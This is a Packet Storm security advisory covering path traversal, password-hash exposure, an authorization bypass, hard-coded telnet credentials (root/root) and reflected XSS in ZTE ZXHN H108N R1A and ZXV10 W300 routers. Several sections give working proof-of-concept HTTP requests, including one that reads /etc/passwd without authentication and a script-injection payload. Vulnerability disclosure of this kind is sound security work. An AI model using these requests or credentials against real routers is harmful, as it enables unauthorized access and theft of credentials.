what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ZTE ZXHN H108N R1A / ZXV10 W300 Traversal / Disclosure / Authorization

ZTE ZXHN H108N R1A / ZXV10 W300 Traversal / Disclosure / Authorization
Posted Nov 20, 2015
Authored by Karn Ganeshen

ZTE ZXHN H108N R1A and ZXV10 W300 routers suffer from path traversal, information disclosure, improper authorization, and hard-coded credential vulnerabilities.

tags | exploit, vulnerability, file inclusion, info disclosure
advisories | CVE-2015-7248, CVE-2015-7249, CVE-2015-7250, CVE-2015-7251, CVE-2015-7252
SHA-256 | 2735f65d35edc3931a3eae6069d85013b997afb9f924b5865ac99b6d29c02f0f

ZTE ZXHN H108N R1A / ZXV10 W300 Traversal / Disclosure / Authorization

Change Mirror Download
# Exploit Title: [ZTE ZXHN H108N R1A + ZXV10 W300 routers - multiple
vulnerabilities]
# Discovered by: Karn Ganeshen
# CERT VU# 391604
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported
# ZTE ZXHN H108N R1A - Software version ZTE.bhs.ZXHNH108NR1A
# ZTE ZXV10 W300 - Software version - w300v1.0.0f_ER1_PE

Overview
ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10
W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities.
*CVE-ID*:
CVE-2015-7248
CVE-2015-7249
CVE-2015-7250
CVE-2015-7251
CVE-2015-7252

*Note*: Large deployment size, primarily in Peru, used by TdP.

Description
*CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information
Exposure* - CVE-2015-7248
Multiple information exposure vulnerabilities enable an attacker to obtain
credentials and other sensitive details about the ZXHN H108N R1A.
A. User names and password hashes can be viewed in the page source of
http://<IP>/cgi-bin/webproc

PoC:

Login Page source contents:

...snip....
//get user info
var G_UserInfo = new Array();
var m = 0;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "admin"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here
G_UserInfo[m][2] = "1"; //Level
G_UserInfo[m][3] = "1"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "user"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "2"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "support"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "3"; //Index
m++;
...snip...

B. The configuration file of the device contains usernames, passwords,
keys, and other values in plain text, which can be used by a user with
lower privileges to gain admin account access. This issue also affects ZTE
ZXV10 W300 models, version W300V1.0.0f_ER1_PE.


*CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper
Authorization* - CVE-2015-7249

By default, only admin may authenticate directly with the web
administration pages in the ZXHN H108N R1A. By manipulating parameters in
client-side requests, an attacker may authenticate as another existing
account, such as user or support, and may be able to perform actions
otherwise not allowed.

PoC 1:
1. Login page user drop-down option shows only admin only.
2. Use an intercepting proxy / Tamper Data - and intercept the Login submit
request.
3. Change the username admin to user / support and continue Login.
4. Application permits other users to log in to mgmt portal.

PoC 2:
After logging in as support, some functional options are visibly
restricted. Certain actions can still be performed by calling the url
directly. Application does not perform proper AuthZ checks.

Following poc is a change password link. It is accessible directly, though
it (correctly) is restricted to changing normal user (non-admin) password
only.

http://
<IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd

Other functions / pages may also be accessible to non-privileged users.


*CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper
Limitation of a Pathname to a Restricted Directory ('Path Traversal') *-
CVE-2015-7250

The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter
which takes an unrestricted file path as input, allowing an attacker to
read arbitrary files on the system.

Arbitrary files can be read off of the device. No authentication is
required to exploit this vulnerability.

PoC

HTTP POST request

POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177

getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj­
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a


HTTP Response

HTTP/1.0 200 OK
Content­type: text/html
Pragma: no­cache
Cache­Control: no­cache
set­cookie: sessionid=7ce7bd4a; expires=Fri, 31­Dec­9999 23:59:59
GMT;path=/

#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh


*CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of
Hard-coded Credentials* - CVE-2015-7251

In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible
using the hard-coded credentials 'root' for both the username and password.

*CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper
Neutralization of Input During Web Page Generation ('Cross-site
Scripting') *- CVE-2015-7252

In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is
vulnerable to reflected cross-site scripting [pre-authentication].

PoC

POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177

getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj­
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a



+++++
--
Best Regards,
Karn Ganeshen
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close